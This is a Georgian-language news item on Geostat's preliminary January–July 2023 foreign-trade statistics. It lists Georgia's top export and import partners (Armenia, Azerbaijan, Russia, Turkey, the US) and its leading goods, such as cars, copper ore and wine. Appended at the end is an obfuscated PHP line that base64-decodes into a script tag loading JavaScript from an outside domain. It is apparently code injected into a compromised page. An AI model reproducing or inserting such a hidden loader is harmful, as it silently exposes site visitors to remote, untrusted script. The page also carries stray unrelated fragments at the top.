celsiusi
ავერსი საქკაბელი

სტატისტიკის ეროვნული სამსახურის წინასწარი მონაცემებით, 2023 წლის იანვარ-ივლისში ათი უმსხვილესი საექსპორტო პარტნიორი ქვეყნის წილმა საქართველოს მთლიან ექსპორტში 80.8 პროცენტი შეადგინა.

საქსტატის ცნობით, უმსხვილეს საექსპორტო სამეულში პირველ ადგილს სომხეთი იკავებს 495.0 მლნ. აშშ დოლარით, მეორე ადგილზეა აზერბაიჯანი 485.3 მლნ. აშშ დოლარით, ხოლო მესამეზე – რუსეთი 416.2 მლნ. აშშ დოლარით.

რაც შეეხება იმპორტს, უწყების მონაცემებით, მიმდინარე წლის იანვარ-ივლისში ათი უმსხვილესი საიმპორტო პარტნიორი ქვეყნის წილმა საქართველოს მთლიან იმპორტში 70.7 პროცენტი შეადგინა. პირველ სამეულში შედიან თურქეთი – 1 420.6 მლნ. აშშ დოლარით, რუსეთი – 1 087.5 მლნ. აშშ დოლარითა და აშშ – 975.3 მლნ. აშშ დოლარით.

ამასთან, უწყების ანგარიშის მიხედვით, 2023 წლის იანვარ-ივლისში სასაქონლო ჯგუფებიდან საექსპორტო ათეულში პირველი ადგილი დაიკავა მსუბუქმა ავტომობილებმა 1 177.8 მლნ. აშშ დოლარით, რაც მთელი ექსპორტის 32.9 პროცენტს შეადგენს. მეორე ადგილს იკავებს სპილენძის მადნები და კონცენტრატები 380.6 მლნ. აშშ დოლარით, ხოლო მესამე ადგილზეა ყურძნის ნატურალური ღვინოები 150.3 მლნ. აშშ დოლარით.

საქსტატის მონაცემებით, უმსხვილესი საიმპორტო სასაქონლო ჯგუფი 2023 წლის იანვარ-ივლისში წარმოდგენილი იყო მსუბუქი ავტომობილების სახით, რომლის იმპორტმა 1 620.1 მლნ. აშშ დოლარი და მთელი იმპორტის 19.0 პროცენტი შეადგინა. მეორე ადგილს იკავებს ნავთობი და ნავთობპროდუქტები 608.5 მლნ. აშშ დოლარით, ხოლო მესამე ადგილზეა დაფასოებული სამკურნალო საშუალებები 307.7 მლნ. აშშ დოლარით.

318
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");